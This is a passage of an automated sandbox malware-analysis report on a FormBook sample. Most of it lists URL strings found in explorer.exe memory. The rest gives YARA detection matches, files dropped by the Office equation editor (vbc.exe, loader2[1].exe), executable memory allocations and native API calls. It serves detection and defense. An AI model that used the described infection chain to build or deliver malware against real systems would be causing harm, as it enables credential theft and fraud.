          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2158023597.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2158689083.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2157511014.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2157630203.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000006.00000000.2169875970.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405042 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.510000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader2[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\control.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\control.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181D0 NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418280 NtReadFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418300 NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183B0 NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041827B NtCreateFile,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182FD NtClose,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004183AB NtAllocateVirtualMemory,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009700C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00970048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00970078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009707AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0096FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009710D0 NtOpenProcessToken,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00970060 NtQuerySection,
          Source: C:\Users\Public\vbc.exeCode function: 5_2_009701D4 NtSetValueKey,
